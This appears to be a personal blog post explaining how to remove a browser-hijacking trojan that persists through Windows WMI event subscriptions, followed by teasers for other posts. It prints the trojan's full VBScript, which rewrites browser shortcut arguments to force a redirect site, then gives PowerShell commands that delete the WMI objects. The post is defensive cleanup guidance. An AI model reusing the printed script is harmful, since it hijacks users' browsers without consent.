Skip to main content

HAO.169x.cn Virus removal.

Hello!
After fighting with this nasty trojan I finally found a solution.

The trojan resides inside windows WMI.

It executes a script that looks like this:


On Error Resume Next
Const link = "http://hao.169x.cn/?v=108&m=yx"
Const link360 = "http://hao.169x.cn/?v=108&m=yx&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\shome\Desktop,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\shome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
browsersArr = Split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr
    oDic.Add LCase(browser), browser
Next
lnkpathsArr = Split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
    oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
    If fso.FolderExists(oFolder) Then
      For Each file In fso.GetFolder(oFolder).Files
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
                Set oShellLink = WshShell.CreateShortcut(file.Path)
                path = oShellLink.TargetPath
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
                If oDic.Exists(LCase(name)) Then
                  If LCase(name) = LCase("360se.exe") Then
                        oShellLink.Arguments = link360
                  Else
                        oShellLink.Arguments = link
                  End If
                  If file.Attributes And 1 Then
                        file.Attributes = file.Attributes - 1
                  End If
                  oShellLink.Save
                End If
            End If
      Next
    End If
Next
to remove it is quite simple:

run powershell as administrator and the issue these 4 commands:


gwmi -Namespace "root/cimv2" -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='VBScriptKids_filter'""" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class ActiveScriptEventConsumer -Filter "Name = 'VBScriptKids_consumer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __IntervalTimerInstruction -Filter "TimerID = 'VBScriptKids_timer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __EventFilter -Filter "Name = 'VBScriptKids_filter'" | Remove-WmiObject


P.S.
The trojan has been found in many softwares including KMS10.
You should remove these softwares too.


Comments

Post a Comment

Popular posts from this blog

TP-LINK Configuration file encrypt and decrypt.

Here we go! TP-Link is another company that thinks that security by obscurity could ever work. If you "backup" the configuration from most TP-Link routers, you will get a .BIN file which is "encrypted". Use this utility below, to decrypt it (so you can edit it) and encrypt it again. Have fun. Drop files here or

Powerline Ethernet fun and secrets.

Many 200 Mb/s powerline adapters nowadays are based on the INTELLON 6300 chipset. Despite what can be thought looking at them, they are all using the same hardware and firmwares. I heard many people with Netgear XAV101 or Linksys PLK 200 or PLE 200 having problems after firmware updates and many other people with other brands having much more problems because of lack of support or configuration/upgrade utilities. So let me explain a few things I learnt studying them. Many of 200 Mb/s powerline ethernet adapters follow the "HomePlug AV" standard. (85 Mb adapters use HomePlug 1.0 standard which is completely different). This standard uses ethernet broadcast packets using the HomePlug AV protocol. The interesting thing is that their firmware is made of two different parts: a .PIB file (Parameter Information Block) and a .NVM file (the code itself). In the P.I.B. there are many interesting things: The branding (mac address, device name, etc) and the tone map. I test

Your own CORS ANYWHERE proxy on CLOUDFLARE

Hello again! Many of you probably hate as I do CORS because it hinders the very nature of internet, which is SHARING. There are some services to circumvent this commercial  restriction, one of these is the famous "cors anywhere". So yesterday I decided to make my own and allow you to make your own in only 2 minutes. To do so you just need a cloudflare account (can be set up in 1 minute). The you can upload my worker on it and have your personal very fast cors proxy! So, enough talk, just head to:  https://github.com/Zibri/cloudflare-cors-anywhere The is also a demo online at: https://test.cors.workers.dev Enjoy! Zibri